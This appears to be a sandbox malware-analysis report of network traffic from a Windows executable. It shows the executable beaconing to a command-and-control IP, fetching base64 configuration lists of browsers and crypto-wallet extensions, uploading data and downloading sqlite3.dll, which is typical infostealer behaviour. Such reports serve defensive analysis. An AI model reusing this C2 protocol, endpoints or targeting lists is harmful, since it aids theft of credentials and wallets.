Jul 2, 2024 07:31:17.424948931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424957037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424966097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424982071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.424989939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.425036907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.425077915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.425086975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.425091028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.425095081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.425102949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.425179005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.425188065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.428947926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.428956985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.428987980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.429058075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:17.429068089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:18.254029989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:18.254414082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:18.344935894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:18.350833893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:18.802597046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:18.802690029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:21.372255087 CEST	49730	80	192.168.2.4	40.86.87.10

HTTP Request Dependency Graph

40.86.87.10

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	40.86.87.10	80	6304	C:\Users\user\Desktop\i3NmF0obCm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 07:30:59.142232895 CEST	408	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE Host: 40.86.87.10 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 39 43 32 32 31 34 42 44 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 5a 4f 56 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"5B9C2214BD8B2768236643------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"ZOV------HDGIJJDGCBKFIDHIEBKE--
Jul 2, 2024 07:30:59.952100039 CEST	351	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:30:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 156 Connection: keep-alive Vary: Accept-Encoding Data Raw: 59 6a 63 78 4e 6a 46 69 4e 6d 49 33 4d 44 52 6b 4e 6a 59 77 4d 32 52 68 4d 6a 4a 6d 5a 47 46 6a 4e 6a 5a 6b 59 6a 55 7a 4f 54 5a 6a 59 57 5a 6a 4f 57 4a 6b 4e 54 6b 33 4e 6d 4e 69 59 7a 59 34 4e 44 63 32 4d 6d 55 30 4d 6d 56 6c 4d 6a 55 7a 4d 44 67 30 4d 6a 5a 69 59 54 42 68 5a 44 6b 7a 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: YjcxNjFiNmI3MDRkNjYwM2RhMjJmZGFjNjZkYjUzOTZjYWZjOWJkNTk3NmNiYzY4NDc2MmU0MmVlMjUzMDg0MjZiYTBhZDkzfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Jul 2, 2024 07:30:59.953582048 CEST	466	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDA Host: 40.86.87.10 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="message"browsers------BKJDGCGDAAAKECAKKJDA--
Jul 2, 2024 07:31:00.340101957 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
Jul 2, 2024 07:31:00.340127945 CEST	480	IN	Data Raw: 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 Data Ascii: cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFB
Jul 2, 2024 07:31:00.341852903 CEST	465	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCA Host: 40.86.87.10 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"plugins------AEBGHDBKEBGIDHJJEHCA--
Jul 2, 2024 07:31:00.731966019 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
Jul 2, 2024 07:31:00.732099056 CEST	1236	IN	Data Raw: 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 Data Ascii: bWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWx
Jul 2, 2024 07:31:00.732119083 CEST	1236	IN	Data Raw: 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 6c 68 59 6d 46 6a 61 32 52 71 59 32 6c 76 62 6d 74 76 59 6d 64 73 62 57 52 6b 5a 6d 4a 6a 61 6d Data Ascii: YmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGN
Jul 2, 2024 07:31:00.732136011 CEST	1236	IN	Data Raw: 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 70 71 62 47 46 6b 61 57 35 75 59 32 74 6b 5a 32 Data Ascii: Z2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmp
Jul 2, 2024 07:31:00.732244015 CEST	668	IN	Data Raw: 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 52 35 66 47 70 6f 5a 6d 70 6d 59 32 78 6c 63 47 46 6a 62 32 78 6b 62 57 70 74 61 32 31 6b 62 47 Data Ascii: cGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJ
Jul 2, 2024 07:31:00.787657976 CEST	466	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFC Host: 40.86.87.10 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="message"fplugins------AEBKFIJEGCAAFHJKFCFC--
Jul 2, 2024 07:31:01.357908964 CEST	303	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 108 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Jul 2, 2024 07:31:01.382038116 CEST	199	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBA Host: 40.86.87.10 Content-Length: 5935 Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 07:31:01.382100105 CEST	5935	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 Data Ascii: ------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Jul 2, 2024 07:31:01.820453882 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:02.036533117 CEST	90	OUT	GET /b13597c85f807692/sqlite3.dll HTTP/1.1 Host: 40.86.87.10 Cache-Control: no-cache
Jul 2, 2024 07:31:02.421729088 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:02 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B
Jul 2, 2024 07:31:02.421750069 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 Data Ascii: @0B/70#N@B/81s:<R@B/92P @B
Jul 2, 2024 07:31:02.421761036 CEST	1236	IN	Data Raw: 0a 00 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 47 f7 0a 00 83 ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed Data Ascii: \|$D$4$Gtu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$r
Jul 2, 2024 07:31:02.423806906 CEST	1236	IN	Data Raw: 66 eb 61 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 74 66 eb 61 31 c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 Data Ascii: fa]UEt]%tfa1]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aS
